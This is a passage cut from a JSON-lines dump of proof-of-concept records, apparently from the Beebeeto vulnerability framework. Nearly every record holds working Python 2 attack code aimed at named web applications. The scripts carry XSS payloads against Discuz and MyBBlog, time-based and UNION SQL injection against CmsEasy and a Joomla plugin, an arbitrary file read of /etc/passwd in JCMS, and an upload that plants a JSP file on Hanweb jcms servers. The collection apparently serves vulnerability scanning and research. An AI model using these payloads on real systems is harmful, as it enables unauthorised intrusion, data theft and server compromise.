pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Vulnerable File: 
index.php?option=com_beacondecode&task=", "app_name": "Joomla", "id": "poc-2014-0126", "layer4_protocol": null}
{"create_date": "2014-10-29 13:30:38", "name": "Discuz! 6.0 /viewthread.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Discuz\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/viewthread.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0125',\r\n 'name': 'Discuz! 6.0 /viewthread.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-10-29',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['6.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Discuz\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/viewthread.php', 'php'],\r\n 'desc': 'Cross site scripting has benn found on viewthread.php file.',\r\n 'references': ['https://www.yascanner.com/#!/x/11200',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/viewthread.php?tid=\"/><script>alert(233)</script>'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '\"/><script>alert(233)</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Cross site scripting has benn found on 
viewthread.php file.", "app_name": "Discuz", "id": "poc-2014-0125", "layer4_protocol": null}
{"create_date": "2014-10-28 17:05:44", "name": "dtcms 3.0 /scripts/swfupload/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "dtcms\u6f0f\u6d1e,xss,/scripts/swfupload/swfupload.swf", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0124',\r\n 'name': 'dtcms 3.0 /scripts/swfupload/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': '\u5927\u5b69\u5c0f\u5b69',\r\n 'create_date': '2014-10-28',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'dtcms',\r\n 'vul_version': ['3.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['dtcms\u6f0f\u6d1e', 'xss', '/scripts/swfupload/swfupload.swf'],\r\n 'desc': 'dtcms 3.0 /scripts/swfupload/swfupload.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-069817',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"3a1c6cc728dddc258091a601f28a9c12\"\r\n verify_url = args['options']['target'] + \"/scripts/swfupload/swfupload.swf\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = 
verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "dtcms 3.0 /scripts/swfupload/swfupload.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002", "app_name": "Other", "id": "poc-2014-0124", "layer4_protocol": null}
{"create_date": "2014-10-28 16:50:56", "name": "\u5927\u6c49JCMS\u5185\u5bb9\u7ba1\u7406\u7cfb\u7edf /jcms/m_5_9/sendreport/downfile.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "\u96f7\u950b", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "\u5927\u6c49jcms\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/jcms/m_5_9/sendreport/downfile.jsp,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0122',\r\n 'name': '\u5927\u6c49JCMS\u5185\u5bb9\u7ba1\u7406\u7cfb\u7edf /jcms/m_5_9/sendreport/downfile.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit',\r\n 'author': '\u96f7\u950b',\r\n 'create_date': '2014-10-28',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'JCMS',\r\n 'vul_version': '5.9',\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['\u5927\u6c49jcms\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/jcms/m_5_9/sendreport/downfile.jsp', 'jsp'],\r\n 'desc': 'N/A',\r\n 'references': ['N/A',\r\n ]\r\n },\r\n }\r\n\r\n @classmethod\r\n\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + ('/jcms/m_5_9/sendreport/downfile.jsp?filename=/etc/passwd&'\r\n 'savename=passwd.txt')\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"root:\" in content:\r\n args['success'] = True\r\n 
args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "JCMS", "id": "poc-2014-0122", "layer4_protocol": null}
{"create_date": "2014-10-27 22:54:10", "name": "MyBB MyBBlog 1.0 /inc/plugins/mybblog/modules/tag.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "MyBB\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/inc/plugins/mybblog/modules/tag.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0120',\r\n 'name': 'MyBB MyBBlog 1.0 /inc/plugins/mybblog/modules/tag.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-10-27',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'MyBB',\r\n 'vul_version': ['1.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['MyBB\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/inc/plugins/mybblog/modules/tag.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['https://www.yascanner.com/#!/x/20583',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/mybblog.php?action=tag&tag=\"/><script>alert(1)</script>'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '\"/><script>alert(1)</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": 
"Location File : \r\n/inc/plugins/mybblog/modules/tag.php\r\n\r\nCode :\r\n\r\nadd_breadcrumb($lang->sprintf($lang->mybblog_tags, $mybb->get_input(\"tag\")), \"mybblog.php?action=tag&tag={$mybb->get_input('tag')}\");\r\n\r\n$articles = Article::getByTag($mybb->get_input(\"tag\"));\r\n\r\nNothing Filtering HTML", "app_name": "MyBB", "id": "poc-2014-0120", "layer4_protocol": null}
{"create_date": "2014-10-27 11:41:48", "name": "PHPCMS v9 /phpsso_server Infomation Disclosure POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "flsf", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "PHPCMS\u6f0f\u6d1e,/phpsso_server,Infomation Disclosure,\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0117',\r\n 'name': 'PHPCMS v9 /phpsso_server Infomation Disclosure POC',\r\n 'author': 'flsf',\r\n 'create_date': '2014-10-27',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PHPCMS',\r\n 'vul_version': ['V9'],\r\n 'type': 'Infomation Disclosure',\r\n 'tag': ['PHPCMS\u6f0f\u6d1e', '/phpsso_server', 'Infomation Disclosure', '\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e', 'php'],\r\n 'desc': 'The functions in the global.func.php can not handle with array,so it raise an error.',\r\n 'references': ['',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + \"/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data%5busername%5d=ks\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n except urllib2.HTTPError, e:\r\n content = e.read()\r\n\r\n match = cls.match_patter(content)\r\n if match:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n 
args['poc_ret']['Disclosure'] = match[0]\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n @staticmethod\r\n def match_patter(content, pattern=r'Warning.*?((?:[a-z]:\\\\(?:[\\\\\\w|\\s|\\-|\\.|\\x81-\\xfe|\\x40-\\xfe]+?)global\\.func\\.php)|(?:/[^<>]+?global\\.func\\.php))'):\r\n match = re.findall(pattern, content, re.I|re.M)\r\n return match\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "The functions in the global.func.php can not handle with array,so it raise an error.", "app_name": "phpcms", "id": "poc-2014-0117", "layer4_protocol": null}
{"create_date": "2014-10-27 00:09:17", "name": "CmsEasy 5.5 <=20140718 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "H4rdy", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "CmsEasy\u76f2\u6ce8\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/index.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\nimport datetime\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0116',\r\n 'name': 'CmsEasy 5.5 <=20140718 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'H4rdy',\r\n 'create_date': '2014-10-25',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'CmsEasy',\r\n 'vul_version': ['5.5'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['CmsEasy\u76f2\u6ce8\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/index.php', 'php'],\r\n 'desc': 'CmsEasy 5.5 <=20140718 /lib/table/stats.php\u4e2d$_SERVER\u5e76\u6ca1\u6709\u8f6c\u4e49\uff0c\u9020\u6210\u4e86\u6ce8\u5165.',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-069343',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/index.php/aaa',(select/**/if((select/**/ord(substr(user(),1,1)))=114,sleep(6),0)),1)#\"\r\n verify_url = args['options']['target'] + payload\r\n user_agent = {'User-Agent':'i am baiduspider'}\r\n req = urllib2.Request(verify_url, headers=user_agent)\r\n first_time = datetime.datetime.now()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n last_time = 
datetime.datetime.now()\r\n different_time = (last_time-first_time).seconds\r\n if different_time>=6:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "CmsEasy 5.5 <=20140718 /lib/table/stats.php\u4e2d$_SERVER\u5e76\u6ca1\u6709\u8f6c\u4e49\uff0c\u9020\u6210\u4e86\u6ce8\u5165.", "app_name": "CmsEasy", "id": "poc-2014-0116", "layer4_protocol": null}
{"create_date": "2014-10-24 20:20:17", "name": "Joomla Spider Form Maker <=3.4 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "H4rdy", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Joomla\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/index.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0111',\r\n 'name': 'Joomla Spider Form Maker <=3.4 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'H4rdy',\r\n 'create_date': '2014-10-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Joomla Spider From Maker',\r\n 'vul_version': ['<=3.4'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['Joomla\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/index.php'],\r\n 'desc': 'Joomla 3.4 /index.php \u6587\u4ef6\"id\" \u53d8\u91cf\u6ca1\u6709\u8fdb\u884c\u8fc7\u6ee4.',\r\n 'references': ['http://www.exploit-db.com/exploits/34637/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/index.php?option=com_formmaker&view=formmaker&id=1%20UNION%20ALL%20SELECT%20NULL,\"\r\n \"NULL,NULL,NULL,NULL,CONCAT(0x7165696a71,IFNULL(CAST(md5(3.1415)%20AS%20CHAR),0x20),\"\r\n \"0x7175647871),NULL,NULL,NULL,NULL,NULL,NULL,NULL%23\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"63e1f04640e83605c1d177544a5a0488\" in content:\r\n args['success'] = 
True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Joomla 3.4 /index.php \u6587\u4ef6\"id\" \u53d8\u91cf\u6ca1\u6709\u8fdb\u884c\u8fc7\u6ee4.", "app_name": "Joomla", "id": "poc-2014-0111", "layer4_protocol": null}
{"create_date": "2014-10-23 21:50:56", "name": "Hanweb jcms /opr_import_discussion.jsp \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "flsf", "rank": 4, "port": null, "vul_type": "\u6587\u4ef6\u4e0a\u4f20", "tag": "Hanweb\u6f0f\u6d1e,/opr_import_discussion.jsp,File Upload,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0109',\r\n 'name': 'Hanweb jcms /opr_import_discussion.jsp \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e POC',\r\n 'author': 'flsf',\r\n 'create_date': '2014-10-23',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Hanweb jcms',\r\n 'vul_version': ['*'],\r\n 'type': 'File Upload',\r\n 'tag': ['Hanweb\u6f0f\u6d1e', '/opr_import_discussion.jsp', 'File Upload', 'jsp'],\r\n 'desc': '''\r\n http://127.0.0.1/jcms/m_5_e/module/idea/opr_import_discussion.jsp?typeid=0&fn_billstatus=S\r\n \u53ef\u4e0a\u4f20\u6587\u4ef6,\u672a\u9650\u5236\u4e0a\u4f20\u6587\u4ef6\u7c7b\u578b,\u5bfc\u81f4\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u3002\r\n ''',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-075585',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + \"/jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/v.jsp\"\r\n target_url = args['options']['target'] + \"/jcms/m_5_e/module/idea/opr_import_discussion.jsp?typeid=0&fn_billstatus=S\"\r\n file_v_jsp = '''<%@ page import=\"java.util.*,java.io.*\" %>\r\n <%@ page 
import=\"java.io.*\"%>\r\n <%\r\n String path=application.getRealPath(request.getRequestURI());\r\n File d=new File(path);\r\n out.println(path);\r\n if(d.exists()){\r\n d.delete();\r\n }\r\n %>\r\n <% out.println(\"00799a96dcc29282dd74e23e49b647a6a\");%>\r\n '''\r\n files = {'file': ('v.jsp', file_v_jsp, 'multipart/form-data')}\r\n\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n\r\n response = requests.post(target_url, files=files) # \u4e0a\u4f20\r\n response = requests.get(verify_url) # \u9a8c\u8bc1\r\n content = response.content\r\n if '00799a96dcc29282dd74e23e49b647a6a' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "http://127.0.0.1/jcms/m_5_e/module/idea/opr_import_discussion.jsp?typeid=0&fn_billstatus=S\r\n\u53ef\u4e0a\u4f20\u6587\u4ef6,\u672a\u9650\u5236\u4e0a\u4f20\u6587\u4ef6\u7c7b\u578b,\u5bfc\u81f4\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u3002", "app_name": "Other", "id": "poc-2014-0109", "layer4_protocol": null}
{"create_date": "2014-10-23 00:20:15", "name": "U-Mail /webmail/userapply.php \u8def\u5f84\u6cc4\u6f0f POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u96f7\u8702", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Information Disclosure,U-Mail\u6f0f\u6d1e,/webmail/userapply.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0105',\r\n 'name': 'U-Mail /webmail/userapply.php \u8def\u5f84\u6cc4\u6f0f POC',\r\n 'author': '\u53f6\u5b50',\r\n 'create_date': '2014-10-23',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'U-Mail',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Information Disclosure', 'U-Mail\u6f0f\u6d1e', '/webmail/userapply.php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2010-049525'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/webmail/userapply.php?execadd=333&DomainID=111'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n res = re.compile(r'supplied argument is not a valid MySQL result resource in <b>(.*)</b> on line')\r\n match = res.findall(content)\r\n if match:\r\n if '<b>Warning</b>:' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif 
__name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "U-Mail", "id": "poc-2014-0105", "layer4_protocol": null}
{"create_date": "2014-10-22 20:26:10", "name": "Emlog 5.3.1 /include/lib/js/uploadify/uploadify.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "emblog\u6f0f\u6d1e,xss,php,/uploadify.swf", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0103', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'Emlog 5.3.1 /include/lib/js/uploadify/uploadify.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': '\u5927\u5b69\u5c0f\u5b69', # \u4f5c\u8005\r\n 'create_date': '2014-10-22', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'emblog', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['5.3.1'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Cross Site Scripting', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['emblog\u6f0f\u6d1e', 'xss', 'php', '/uploadify.swf'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'emblog include/lib/js/uploadify/uploadify.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-069818', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n 
